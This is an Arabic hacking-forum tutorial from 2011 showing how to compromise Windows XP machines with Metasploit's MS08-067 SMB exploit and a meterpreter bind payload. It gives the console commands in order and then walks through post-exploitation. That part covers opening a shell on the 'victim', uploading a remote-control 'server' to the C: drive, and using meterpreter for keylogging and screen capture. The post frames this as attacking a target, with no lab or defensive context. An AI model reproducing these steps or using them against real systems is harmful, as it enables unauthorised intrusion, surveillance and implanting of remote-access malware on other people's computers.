وادى الملوك
يسعدني تواجدك ..فية المنتدى ..ويسعدني انضمامك للمنتدى تقبل..تحياتي
وادى الملوك
يسعدني تواجدك ..فية المنتدى ..ويسعدني انضمامك للمنتدى تقبل..تحياتي
وادى الملوك
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.



 
الرئيسيةأحدث الصورالتسجيلدخول

وادى الملوك :: قــــــــــــسم الهــــــــــــكر :: قسم الباك تراك
 

 اخترق وزينذوز اكس بى بالميتا اتفرج واتعلم منى

اذهب الى الأسفل 
كاتب الموضوعرسالة
Đõn't þļáý wïtĥ Μę
مشرف الهكر
مشرف الهكر
Đõn't þļáý wïtĥ Μę


":., اَلَـرٍٍََئَـــُـأٍٍَسَــه ,.:"
عدد المساهمات : 104
الطاقة : 171
تاريخ التسجيل : 21/08/2011
العمر : 35
الموقع : ف بيت الموزه ههههههههههههه

اخترق وزينذوز اكس بى بالميتا اتفرج واتعلم منى Empty
مُساهمةموضوع: اخترق وزينذوز اكس بى بالميتا اتفرج واتعلم منى    اخترق وزينذوز اكس بى بالميتا اتفرج واتعلم منى I_icon_minitimeالإثنين أكتوبر 10, 2011 10:12 pm
السلام عليكم

كيفكم شباب ان شاء الله بخير

اليوم عملت لكم درس من دروس الـ backtrack4
شرحنا اليوم اختراق ويندوز اكس بي عن طريق ثغره
smb/ms08_067_netapi
طبعآ الكل عارفيها بس عارفيها بأستخدام اتصال reverse
وهذا شغلتها طويله شوي تخلي الاي بي تبعك وتفتح بورت صعبه
اتصال عكسي يعني
بعد تطوير راح نخليها bind

الفرق بين bind و reverse
او الـ reverse اتصال العكسي لازم تفتح بورت وتضع الاي بي الخاص بك مع الاستغلال
امال الـ bind هذا مباشره لا تضع الاي بي تبعك ولا هم يحزنون فقط استغل وباشر ولا تفتح بورت
واسف جدآ اذا نسيت شي تاني

نبدء الشرح على بركة الله

اول شي مقدمه البورت للثغره 445
الثغره شغاله على انضمه الويندوز
من Windows XP SP3 ومافوق
ولشرح على نضام باك تراك 4
ومش مهم اذا عندك بلويندوز ميتا سبلويت عادي مايحتاج

ولشرح مصور بلصوره ان شاء الله ينال اعجابكم

الان نذهب لتشغيل ميتا سبلويت الـ


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


بعد تشغيل الميتا نكتب show exploits
لاضهاء الثغرات


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


بعد اضهار الثغرات نبحث على هذا الثغره


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


وبعدها ننزل تحت ونكتب use واسم الثغره الي انا عامل عليها بلون الاحمر
يصبح هكذا
use windows/smb/ms08_067_netapi
ونضغط انتر لاستغلالها


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


وبعد مانضغط انتر نكتب الامر
show payloads
لاضهار البايلو


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


بعد ماتضهر البايلود نبحث على هذا
windows/meterpreter/bind_tcp
نأخذها كوبي


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


وننزل تحت نكتب الامر set واسم البايلود
يصبح هكذا
set payload windows/meterpreter/bind_tcp
ونضغط انتر

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


بعد ذاك لانتي للخطوه النهائيه
بعد مانستغل البايلود نكتب الامر
اي بي المستهدف set rhost
ونضغط انت


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


بعد مانضغط انتر نكتب الامر
exploit
لتطبيق الثغره على جهاز المستهدف


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


بعد ماتضغط انتر يتم اختراق الجهاز ويضهر لك
الـ meterpreter يعني تم وتقدر تتحكم بحهازه عن طريق الـ meterpreter


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


حلو !
الان خلصنا
نشرح بعض الاوامر
بعد مايطلع لك الـ meterpreter
نكتب الامر help لمشاهده الاوامر الي نقدر نتحكم فيها بجهاز المستهدف


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


وهذا هيه الاوامر
كثيره جدآ انا قدر اصور لكم بعض الاوامر منها



[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


لان نكتب الامر shall
لذهاب الى الدوس الخاص بلضحيه
وطبق اوامر الويندوز على راحتك


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


بعد ماتطبق اوامر انت بكيفك وبدك ترجع الى meterpreter
لتطبيق اوامر الميتا مثل التجسس على الكيبورد رفع سيرفر تصوير الشاشه
نكتب الامر exit
ونرجع للـ meterpreter


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


الان بدنا نرفع سيرفر على جهاز الضحيه !
نكتب الامر upload ونكتب مسار الملف الي بدك ترفعه ومسار نزول الملف في جهاز الضحيه
الي هوه c:\
لتفادي المشاكل وصعوبه نكتب الامر ابلود ثم نسحب الملف الي بدنا نرفعه الى الميتا
ونكتب الامر c:\ للنزول في بارتشن الـ c


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


تم الرفع


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


بس احنه الان بدنا نشغل الملف في جهاز الضحيه او التأكد من انو الملف موجود
نكتب الامر shall للذهاب الى شاشه الدوس الخاصه بلضحيه


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


ثم نكتب الامر cd.. للرجوع الى ملف الـ WINDOWS
وبعد مانكتب الامر cd.. ورجعنا لملف الويندوز ايضآ نكتب مره ثانيه
cd.. للرجوع الى ملف الـ c عشان نشغل الملف او نشوف الملف موجود او لاء


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


الان رجعنا الى ملف الـ c الخاص بلضحيه نكتب الامر dir
لاضهار الملفات الموجوده بملف الـ c
نفس الامر الخاص بنضام اللينوكس الي هوه ls


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


بعد مانكتب الامر dir تضهر لنا الملفات ولدهاليز الي في بارتشن الـ c


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


ها وقت تم الرفع الملف بنجاح مبرووك عليك الاختراق




بالله عليكم ياشباب لاتنسو التقيم ماتكلف معاك دقيقه

روآبط الصوٌر لمٌن لمٌ تظهر لديه

كود:

https://2img.net/r/ihimizer/img6/6324/snap20111001041516001.png
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


الاهداء
مايو
عرزا اليكس
اخواتى
بحبكم كلكم
ارجوكم التقيم
علشان تعبت ف الشرح بجد



[
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
اخترق وزينذوز اكس بى بالميتا اتفرج واتعلم منى
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» شرح مني انا كيفية الاختراق بالميتا سبلويت
» عمل شبكة وهمية واير ليس باي اسم و اخترق كل من يشترك بها

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
وادى الملوك :: قــــــــــــسم الهــــــــــــكر :: قسم الباك تراك-
انتقل الى: